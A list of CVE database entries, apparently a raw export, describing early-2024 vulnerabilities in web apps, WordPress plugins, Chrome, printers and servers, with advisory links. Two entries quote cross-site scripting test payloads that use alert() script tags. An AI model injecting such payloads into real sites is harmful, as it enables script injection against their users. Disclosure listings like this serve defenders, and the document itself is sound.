CVE    2024    265    Candidate    A vulnerability was found in SourceCodester Clinic Queuing System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /index.php of the component GET Parameter Handler. The manipulation of the argument page leads to file inclusion. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249821 was assigned to this vulnerability.    MISC:https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE   |   URL:https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE   |   MISC:https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE/blob/main/clinicx.py   |   URL:https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE/blob/main/clinicx.py   |   MISC:https://vuldb.com/?ctiid.249821   |   URL:https://vuldb.com/?ctiid.249821   |   MISC:https://vuldb.com/?id.249821   |   URL:https://vuldb.com/?id.249821    Assigned (20240106)
CVE    2024    264    Candidate    A vulnerability was found in SourceCodester Clinic Queuing System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /LoginRegistration.php. The manipulation of the argument formToken leads to authorization bypass. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249820.    MISC:https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE/   |   URL:https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE/   |   MISC:https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE/blob/main/clinicx.py   |   URL:https://github.com/jmrcsnchz/ClinicQueueingSystem_RCE/blob/main/clinicx.py   |   MISC:https://vuldb.com/?ctiid.249820   |   URL:https://vuldb.com/?ctiid.249820   |   MISC:https://vuldb.com/?id.249820   |   URL:https://vuldb.com/?id.249820    Assigned (20240106)
CVE    2024    263    Candidate    A vulnerability was found in ACME Ultra Mini HTTPd 1.21. It has been classified as problematic. This affects an unknown part of the component HTTP GET Request Handler. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-249819.    MISC:https://0day.today/exploit/description/39212   |   URL:https://0day.today/exploit/description/39212   |   MISC:https://packetstormsecurity.com/files/176333/Ultra-Mini-HTTPd-1.21-Denial-Of-Service.html   |   URL:https://packetstormsecurity.com/files/176333/Ultra-Mini-HTTPd-1.21-Denial-Of-Service.html   |   MISC:https://vuldb.com/?ctiid.249819   |   URL:https://vuldb.com/?ctiid.249819   |   MISC:https://vuldb.com/?id.249819   |   URL:https://vuldb.com/?id.249819   |   MISC:https://www.youtube.com/watch?v=HWOGeg3e5As   |   URL:https://www.youtube.com/watch?v=HWOGeg3e5As    Assigned (20240106)
CVE    2024    262    Candidate    A vulnerability was found in Online Job Portal 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /Admin/News.php of the component Create News Page. The manipulation of the argument News with the input </title><scRipt>alert(0x00C57D)</scRipt> leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249818 is the identifier assigned to this vulnerability.    MISC:https://mega.nz/file/zEsxyIYQ#re6pHT-2OGX9SNk1OpygDCQYu1RpBiOrQ_2QS6beRos   |   URL:https://mega.nz/file/zEsxyIYQ#re6pHT-2OGX9SNk1OpygDCQYu1RpBiOrQ_2QS6beRos   |   MISC:https://vuldb.com/?ctiid.249818   |   URL:https://vuldb.com/?ctiid.249818   |   MISC:https://vuldb.com/?id.249818   |   URL:https://vuldb.com/?id.249818    Assigned (20240106)
CVE    2024    261    Candidate    A vulnerability has been found in Sentex FTPDMIN 0.96 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component RNFR Command Handler. The manipulation leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249817 was assigned to this vulnerability.    MISC:https://packetstormsecurity.com/files/176342/FTPDMIN-0.96-Denial-Of-Service.html   |   URL:https://packetstormsecurity.com/files/176342/FTPDMIN-0.96-Denial-Of-Service.html   |   MISC:https://vuldb.com/?ctiid.249817   |   URL:https://vuldb.com/?ctiid.249817   |   MISC:https://vuldb.com/?id.249817   |   URL:https://vuldb.com/?id.249817   |   MISC:https://www.youtube.com/watch?v=q-CVJfYdd-g   |   URL:https://www.youtube.com/watch?v=q-CVJfYdd-g    Assigned (20240106)
CVE    2024    260    Candidate    A vulnerability, which was classified as problematic, was found in SourceCodester Engineers Online Portal 1.0. Affected is an unknown function of the file change_password_teacher.php of the component Password Change. The manipulation leads to session expiration. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249816.    MISC:https://mega.nz/file/yEsSwK6D#--ygVt0NtzhZdqVxvjaPLCYfnIeBSyf76KaRozOxfVo   |   URL:https://mega.nz/file/yEsSwK6D#--ygVt0NtzhZdqVxvjaPLCYfnIeBSyf76KaRozOxfVo   |   MISC:https://vuldb.com/?ctiid.249816   |   URL:https://vuldb.com/?ctiid.249816   |   MISC:https://vuldb.com/?id.249816   |   URL:https://vuldb.com/?id.249816    Assigned (20240106)
CVE    2024    258    Candidate    The issue was addressed with improved memory handling. This issue is fixed in tvOS 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4, watchOS 10.4. An app may be able to execute arbitrary code out of its sandbox or with certain elevated privileges.    FULLDISC:20240313 APPLE-SA-03-07-2024-2 macOS Sonoma 14.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/21   |   FULLDISC:20240313 APPLE-SA-03-07-2024-5 watchOS 10.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/24   |   FULLDISC:20240313 APPLE-SA-03-07-2024-6 tvOS 17.4   |   URL:http://seclists.org/fulldisclosure/2024/Mar/25   |   MISC:https://support.apple.com/en-us/HT214081   |   URL:https://support.apple.com/en-us/HT214081   |   MISC:https://support.apple.com/en-us/HT214084   |   URL:https://support.apple.com/en-us/HT214084   |   MISC:https://support.apple.com/en-us/HT214086   |   URL:https://support.apple.com/en-us/HT214086   |   MISC:https://support.apple.com/en-us/HT214088   |   URL:https://support.apple.com/en-us/HT214088    Assigned (20240105)
CVE    2024    256    Candidate    The Starbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Profile Display Name and Social Settings in all versions up to, and including, 3.4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3029599/starbox   |   URL:https://plugins.trac.wordpress.org/changeset/3029599/starbox   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0eafe473-9177-47c4-aa1e-2350cb827447?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0eafe473-9177-47c4-aa1e-2350cb827447?source=cve    Assigned (20240105)
CVE    2024    255    Candidate    The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wprm-recipe-text-share' shortcode in all versions up to, and including, 9.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php#L52   |   URL:https://plugins.trac.wordpress.org/browser/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php#L52   |   MISC:https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php   |   URL:https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/53a51408-e5d8-4727-9dec-8321c062c31e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/53a51408-e5d8-4727-9dec-8321c062c31e?source=cve    Assigned (20240105)
CVE    2024    254    Candidate    The (Simply) Guest Author Name plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's post meta in all versions up to, and including, 4.34 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/guest-author-name/trunk/sfly-guest-author.php   |   URL:https://plugins.trac.wordpress.org/browser/guest-author-name/trunk/sfly-guest-author.php   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027723%40guest-author-name&new=3027723%40guest-author-name&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3027723%40guest-author-name&new=3027723%40guest-author-name&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0e9e2864-6624-497f-8bec-df8360ed3f4a?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0e9e2864-6624-497f-8bec-df8360ed3f4a?source=cve    Assigned (20240105)
CVE    2024    253    Candidate    ManageEngine ADAudit Plus versions 7270 and below are vulnerable to authenticated SQL injection in home Graph-Data.    MISC:https://www.manageengine.com/products/active-directory-audit/sqlfix-7271.html   |   URL:https://www.manageengine.com/products/active-directory-audit/sqlfix-7271.html    Assigned (20240105)
CVE    2024    252    Candidate    ManageEngine ADSelfService Plus versions 6401 and below are vulnerable to remote code execution due to improper handling in the load balancer component. Authentication is required to exploit this vulnerability.    MISC:https://www.manageengine.com/products/self-service-password/advisory/CVE-2024-0252.html   |   URL:https://www.manageengine.com/products/self-service-password/advisory/CVE-2024-0252.html    Assigned (20240105)
CVE    2024    251    Candidate    The Advanced Woo Search plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search parameter in all versions up to, and including, 2.96 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This only affects sites when the Dynamic Content for Elementor plugin is also installed.    MISC:https://plugins.trac.wordpress.org/browser/advanced-woo-search/tags/2.94/includes/class-aws-integrations.php#L2170   |   URL:https://plugins.trac.wordpress.org/browser/advanced-woo-search/tags/2.94/includes/class-aws-integrations.php#L2170   |   MISC:https://plugins.trac.wordpress.org/browser/advanced-woo-search/tags/2.94/includes/class-aws-integrations.php#L287   |   URL:https://plugins.trac.wordpress.org/browser/advanced-woo-search/tags/2.94/includes/class-aws-integrations.php#L287   |   MISC:https://plugins.trac.wordpress.org/browser/advanced-woo-search/tags/2.97/includes/class-aws-integrations.php#L2104   |   URL:https://plugins.trac.wordpress.org/browser/advanced-woo-search/tags/2.97/includes/class-aws-integrations.php#L2104   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/91358e40-e64f-4e8e-b5a3-7d2133db5fe9?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/91358e40-e64f-4e8e-b5a3-7d2133db5fe9?source=cve    Assigned (20240105)
CVE    2024    250    Candidate    The Analytics Insights for Google Analytics 4 (AIWP) WordPress plugin before 6.3 is vulnerable to Open Redirect due to insufficient validation on the redirect oauth2callback.php file. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.    MISC:https://wpscan.com/vulnerability/321b07d1-692f-48e9-a8e5-a15b38efa979/   |   URL:https://wpscan.com/vulnerability/321b07d1-692f-48e9-a8e5-a15b38efa979/    Assigned (20240105)
CVE    2024    248    Candidate    The EazyDocs WordPress plugin before 2.4.0 re-introduced CVE-2023-6029 (https://wpscan.com/vulnerability/7a0aaf85-8130-4fd7-8f09-f8edc929597e/) in 2.3.8, allowing any authenticated user, such as a subscriber, to delete arbitrary posts, as well as add and delete documents/sections. The issue was partially fixed in 2.3.9.    MISC:https://wpscan.com/vulnerability/faf50bc0-64c5-4ccc-a8ac-e73ed44a74df/   |   URL:https://wpscan.com/vulnerability/faf50bc0-64c5-4ccc-a8ac-e73ed44a74df/    Assigned (20240105)
CVE    2024    247    Candidate    A vulnerability classified as critical was found in CodeAstro Online Food Ordering System 1.0. This vulnerability affects unknown code of the file /admin/ of the component Admin Panel. The manipulation of the argument Username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249778 is the identifier assigned to this vulnerability.    MISC:https://drive.google.com/file/d/13xhOZ3Zg-XoviVC744PPDorTxYbLUgbv/view?usp=sharing   |   URL:https://drive.google.com/file/d/13xhOZ3Zg-XoviVC744PPDorTxYbLUgbv/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.249778   |   URL:https://vuldb.com/?ctiid.249778   |   MISC:https://vuldb.com/?id.249778   |   URL:https://vuldb.com/?id.249778    Assigned (20240105)
CVE    2024    246    Candidate    A vulnerability classified as problematic has been found in IceWarp 12.0.2.1/12.0.3.1. This affects an unknown part of the file /install/ of the component Utility Download Handler. The manipulation of the argument lang with the input 1%27"()%26%25<zzz><ScRiPt>alert(document.domain)</ScRiPt> leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249759. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://vuldb.com/?ctiid.249759   |   URL:https://vuldb.com/?ctiid.249759   |   MISC:https://vuldb.com/?id.249759   |   URL:https://vuldb.com/?id.249759    Assigned (20240105)
CVE    2024    244    Candidate    Buffer overflow in CPCA PCFAX number process of Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code.*:Satera MF750C Series firmware v03.07 and earlier sold in Japan. Color imageCLASS MF750C Series/Color imageCLASS X MF1333C firmware v03.07 and earlier sold in US. i-SENSYS MF754Cdw/C1333iF firmware v03.07 and earlier sold in Europe.    MISC:https://canon.jp/support/support-info/240205vulnerability-response   |   URL:https://canon.jp/support/support-info/240205vulnerability-response   |   MISC:https://psirt.canon/advisory-information/cp2024-001/   |   URL:https://psirt.canon/advisory-information/cp2024-001/   |   MISC:https://www.canon-europe.com/support/product-security-latest-news/   |   URL:https://www.canon-europe.com/support/product-security-latest-news/   |   MISC:https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Vulnerability-Measure-Against-Buffer-Overflow-for-Laser-Printers-and-Small-Office-Multifunctional-Printers   |   URL:https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Vulnerability-Measure-Against-Buffer-Overflow-for-Laser-Printers-and-Small-Office-Multifunctional-Printers    Assigned (20240105)
CVE    2024    243    Candidate    With the following crawler configuration: ```python from bs4 import BeautifulSoup as Soup url = "https://example.com" loader = RecursiveUrlLoader( url=url, max_depth=2, extractor=lambda x: Soup(x, "html.parser").text ) docs = loader.load() ``` An attacker in control of the contents of `https://example.com` could place a malicious HTML file in there with links like "https://example.completely.different/my_file.html" and the crawler would proceed to download that file as well even though `prevent_outside=True`. https://github.com/langchain-ai/langchain/blob/bf0b3cc0b5ade1fb95a5b1b6fa260e99064c2e22/libs/community/langchain_community/document_loaders/recursive_url_loader.py#L51-L51 Resolved in https://github.com/langchain-ai/langchain/pull/15559    MISC:https://github.com/langchain-ai/langchain/pull/15559   |   MISC:https://github.com/langchain-ai/langchain/commit/bf0b3cc0b5ade1fb95a5b1b6fa260e99064c2e22   |   URL:https://github.com/langchain-ai/langchain/commit/bf0b3cc0b5ade1fb95a5b1b6fa260e99064c2e22   |   MISC:https://huntr.com/bounties/370904e7-10ac-40a4-a8d4-e2d16e1ca861   |   URL:https://huntr.com/bounties/370904e7-10ac-40a4-a8d4-e2d16e1ca861    Assigned (20240104)
CVE    2024    242    Candidate    Under certain circumstances IQ Panel4 and IQ4 Hub panel software prior to version 4.4.2 could allow unauthorized access to settings.    MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-039-01   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-039-01   |   MISC:https://www.johnsoncontrols.com/cyber-solutions/security-advisories   |   URL:https://www.johnsoncontrols.com/cyber-solutions/security-advisories    Assigned (20240104)
CVE    2024    241    Candidate    encoded_id-rails versions before 1.0.0.beta2 are affected by an uncontrolled resource consumption vulnerability. A remote and unauthenticated attacker might cause a denial of service condition by sending an HTTP request with an extremely long "id" parameter.    MISC:https://github.com/advisories/GHSA-3px7-jm2p-6h2c   |   URL:https://github.com/advisories/GHSA-3px7-jm2p-6h2c   |   MISC:https://github.com/stevegeek/encoded_id-rails/commit/afa495a77b8a21ad582611f9cdc2081dc4018b91   |   URL:https://github.com/stevegeek/encoded_id-rails/commit/afa495a77b8a21ad582611f9cdc2081dc4018b91   |   MISC:https://github.com/stevegeek/encoded_id-rails/security/advisories/GHSA-3px7-jm2p-6h2c   |   URL:https://github.com/stevegeek/encoded_id-rails/security/advisories/GHSA-3px7-jm2p-6h2c   |   MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-3px7-jm2p-6h2c   |   URL:https://vulncheck.com/advisories/vc-advisory-GHSA-3px7-jm2p-6h2c    Assigned (20240104)
CVE    2024    240    Candidate    A memory leak in the Silicon Labs' Bluetooth stack for EFR32 products may cause memory to be exhausted when sending notifications to multiple clients; this causes all Bluetooth operations, such as advertising and scanning, to stop.    MISC:https://community.silabs.com/069Vm000001AjEfIAK   |   URL:https://community.silabs.com/069Vm000001AjEfIAK   |   MISC:https://github.com/SiliconLabs/gecko_sdk   |   URL:https://github.com/SiliconLabs/gecko_sdk    Assigned (20240104)
CVE    2024    239    Candidate    The Contact Form 7 Connector WordPress plugin before 1.2.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against administrators.    MISC:https://wpscan.com/vulnerability/b9a4a3e3-7cdd-4354-8541-4219bd41c854/   |   URL:https://wpscan.com/vulnerability/b9a4a3e3-7cdd-4354-8541-4219bd41c854/    Assigned (20240104)
CVE    2024    238    Candidate    The EventON Premium WordPress plugin before 4.5.6 and the EventON WordPress plugin before 2.2.8 do not have authorisation in an AJAX action, and do not ensure that the post to be updated belongs to the plugin, allowing unauthenticated users to update arbitrary post metadata.    MISC:https://wpscan.com/vulnerability/774655ac-b201-4d9f-8790-9eff8564bc91/   |   URL:https://wpscan.com/vulnerability/774655ac-b201-4d9f-8790-9eff8564bc91/    Assigned (20240104)
CVE    2024    237    Candidate    The EventON WordPress plugin through 4.5.8, EventON WordPress plugin before 2.2.7 do not have authorisation in some AJAX actions, allowing unauthenticated users to update virtual events settings, such as meeting URL, moderator, access details, etc.    MISC:https://wpscan.com/vulnerability/73d1b00e-1f17-4d9a-bfc8-6bc43a46b90b/   |   URL:https://wpscan.com/vulnerability/73d1b00e-1f17-4d9a-bfc8-6bc43a46b90b/    Assigned (20240104)
CVE    2024    236    Candidate    The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorisation in an AJAX action, allowing unauthenticated users to retrieve the settings of arbitrary virtual events, including any meeting password set (for example for Zoom)    MISC:https://wpscan.com/vulnerability/09aeb6f2-6473-4de7-8598-e417049896d7/   |   URL:https://wpscan.com/vulnerability/09aeb6f2-6473-4de7-8598-e417049896d7/    Assigned (20240104)
CVE    2024    235    Candidate    The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorisation in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog    MISC:https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/   |   URL:https://wpscan.com/vulnerability/e370b99a-f485-42bd-96a3-60432a15a4e9/    Assigned (20240104)
CVE    2024    233    Candidate    The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not properly sanitise and escape a parameter before outputting it back in pages, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin    MISC:https://wpscan.com/vulnerability/04a708a0-b6f3-47d1-aac9-0bb17f57c61e/   |   URL:https://wpscan.com/vulnerability/04a708a0-b6f3-47d1-aac9-0bb17f57c61e/    Assigned (20240104)
CVE    2024    232    Candidate    A heap use-after-free issue has been identified in SQLite in the jsonParseAddNodeArray() function in sqlite3.c. This flaw allows a local attacker to leverage a victim to pass specially crafted malicious input to the application, potentially causing a crash and leading to a denial of service.    CONFIRM:https://security.netapp.com/advisory/ntap-20240315-0007/   |   FEDORA:FEDORA-2024-4adf990562   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QDCMYQ3J45NHQ4EJREM3BJNNKB5BK4Y7/   |   MISC:RHBZ#2243754   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2243754   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0232   |   URL:https://access.redhat.com/security/cve/CVE-2024-0232    Assigned (20240104)
CVE    2024    230    Candidate    A session management issue was addressed with improved checks. This issue is fixed in Magic Keyboard Firmware Update 2.0.6. An attacker with physical access to the accessory may be able to extract its Bluetooth pairing key and monitor Bluetooth traffic.    MISC:https://support.apple.com/en-us/HT214050   |   URL:https://support.apple.com/en-us/HT214050    Assigned (20240103)
CVE    2024    229    Candidate    An out-of-bounds memory access flaw was found in the X.Org server. This issue can be triggered when a device frozen by a sync grab is reattached to a different master device. This issue may lead to an application crash, local privilege escalation (if the server runs with extended privileges), or remote code execution in SSH X11 forwarding environments.    MISC:RHBZ#2256690   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2256690   |   MISC:RHSA-2024:0320   |   URL:https://access.redhat.com/errata/RHSA-2024:0320   |   MISC:RHSA-2024:0557   |   URL:https://access.redhat.com/errata/RHSA-2024:0557   |   MISC:RHSA-2024:0558   |   URL:https://access.redhat.com/errata/RHSA-2024:0558   |   MISC:RHSA-2024:0597   |   URL:https://access.redhat.com/errata/RHSA-2024:0597   |   MISC:RHSA-2024:0607   |   URL:https://access.redhat.com/errata/RHSA-2024:0607   |   MISC:RHSA-2024:0614   |   URL:https://access.redhat.com/errata/RHSA-2024:0614   |   MISC:RHSA-2024:0617   |   URL:https://access.redhat.com/errata/RHSA-2024:0617   |   MISC:RHSA-2024:0621   |   URL:https://access.redhat.com/errata/RHSA-2024:0621   |   MISC:RHSA-2024:0626   |   URL:https://access.redhat.com/errata/RHSA-2024:0626   |   MISC:RHSA-2024:0629   |   URL:https://access.redhat.com/errata/RHSA-2024:0629   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0229   |   URL:https://access.redhat.com/security/cve/CVE-2024-0229    Assigned (20240103)
CVE    2024    228    Candidate    ** REJECT ** This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is a duplicate of CVE-2024-0193.        Assigned (20240103)
CVE    2024    226    Candidate    Synopsys Seeker versions prior to 2023.12.0 are vulnerable to a stored cross-site scripting vulnerability through a specially crafted payload.    MISC:https://community.synopsys.com/s/article/SIG-Product-Security-Advisory-CVE-2024-0226-Affecting-Seeker   |   URL:https://community.synopsys.com/s/article/SIG-Product-Security-Advisory-CVE-2024-0226-Affecting-Seeker    Assigned (20240103)
CVE    2024    225    Candidate    Use after free in WebGPU in Google Chrome prior to 120.0.6099.199 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)    FEDORA:FEDORA-2024-210776b8c7   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/   |   FEDORA:FEDORA-2024-a6c2300bca   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYONA2XSNFMXLAW4IHLFI5UVV3QRNG5K/   |   GENTOO:GLSA-202401-34   |   URL:https://security.gentoo.org/glsa/202401-34   |   MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html   |   URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html   |   MISC:https://crbug.com/1506923   |   URL:https://crbug.com/1506923    Assigned (20240103)
CVE    2024    224    Candidate    Use after free in WebAudio in Google Chrome prior to 120.0.6099.199 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)    FEDORA:FEDORA-2024-210776b8c7   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/   |   FEDORA:FEDORA-2024-a6c2300bca   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYONA2XSNFMXLAW4IHLFI5UVV3QRNG5K/   |   GENTOO:GLSA-202401-34   |   URL:https://security.gentoo.org/glsa/202401-34   |   MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html   |   URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html   |   MISC:https://crbug.com/1505086   |   URL:https://crbug.com/1505086    Assigned (20240103)
CVE    2024    223    Candidate    Heap buffer overflow in ANGLE in Google Chrome prior to 120.0.6099.199 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)    FEDORA:FEDORA-2024-210776b8c7   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/   |   FEDORA:FEDORA-2024-a6c2300bca   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYONA2XSNFMXLAW4IHLFI5UVV3QRNG5K/   |   GENTOO:GLSA-202401-34   |   URL:https://security.gentoo.org/glsa/202401-34   |   MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html   |   URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html   |   MISC:https://crbug.com/1505009   |   URL:https://crbug.com/1505009    Assigned (20240103)
CVE    2024    222    Candidate    Use after free in ANGLE in Google Chrome prior to 120.0.6099.199 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)    FEDORA:FEDORA-2024-210776b8c7   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D6C2HN4T2S6GYNTAUXLH45LQZHK7QPHP/   |   FEDORA:FEDORA-2024-a6c2300bca   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AYONA2XSNFMXLAW4IHLFI5UVV3QRNG5K/   |   GENTOO:GLSA-202401-34   |   URL:https://security.gentoo.org/glsa/202401-34   |   MISC:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html   |   URL:https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop.html   |   MISC:https://crbug.com/1501798   |   URL:https://crbug.com/1501798    Assigned (20240103)
CVE    2024    221    Candidate    The Photo Gallery by 10Web – Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.8.19 via the rename_item function. This makes it possible for authenticated attackers to rename arbitrary files on the server. This can lead to site takeovers if the wp-config.php file of a site can be renamed. By default this can be exploited by administrators only. In the premium version of the plugin, administrators can give gallery management permissions to lower level users, which might make this exploitable by users as low as contributors.    MISC:https://plugins.trac.wordpress.org/browser/photo-gallery/trunk/filemanager/controller.php#L291   |   URL:https://plugins.trac.wordpress.org/browser/photo-gallery/trunk/filemanager/controller.php#L291   |   MISC:https://plugins.trac.wordpress.org/browser/photo-gallery/trunk/filemanager/controller.php#L441   |   URL:https://plugins.trac.wordpress.org/browser/photo-gallery/trunk/filemanager/controller.php#L441   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3022981%40photo-gallery%2Ftrunk&old=3013021%40photo-gallery%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3022981%40photo-gallery%2Ftrunk&old=3013021%40photo-gallery%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/3a3b8f32-f29d-4e67-8fad-202bfc8a9918?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/3a3b8f32-f29d-4e67-8fad-202bfc8a9918?source=cve    Assigned (20240103)
CVE    2024    220    Candidate    B&R Automation Studio Upgrade Service and B&R Technology Guarding use insufficient cryptography for communication to the upgrade and the licensing servers. A network-based attacker could exploit the vulnerability to execute arbitrary code on the products or sniff sensitive data. Missing Encryption of Sensitive Data, Cleartext Transmission of Sensitive Information, Improper Control of Generation of Code ('Code Injection'), Inadequate Encryption Strength vulnerability in B&R Industrial Automation B&R Automation Studio (Upgrade Service modules), B&R Industrial Automation Technology Guarding. This issue affects B&R Automation Studio: <4.6; Technology Guarding: <1.4.0.    MISC:https://www.br-automation.com/fileadmin/SA23P019_Automation_Studio_Upgrade_Service_uses_insufficient_encryption.pdf-1b3b181c.pdf   |   URL:https://www.br-automation.com/fileadmin/SA23P019_Automation_Studio_Upgrade_Service_uses_insufficient_encryption.pdf-1b3b181c.pdf    Assigned (20240103)
CVE    2024    219    Candidate    In Telerik JustDecompile versions prior to 2024 R1, a privilege elevation vulnerability has been identified in the application's installer component. In an environment where an existing Telerik JustDecompile install is present, a lower privileged user has the ability to manipulate the installation package to elevate their privileges on the underlying operating system.    MISC:https://docs.telerik.com/devtools/justdecompile/knowledge-base/legacy-installer-vulnerability   |   URL:https://docs.telerik.com/devtools/justdecompile/knowledge-base/legacy-installer-vulnerability   |   MISC:https://www.telerik.com/products/decompiler.aspx   |   URL:https://www.telerik.com/products/decompiler.aspx    Assigned (20240103)
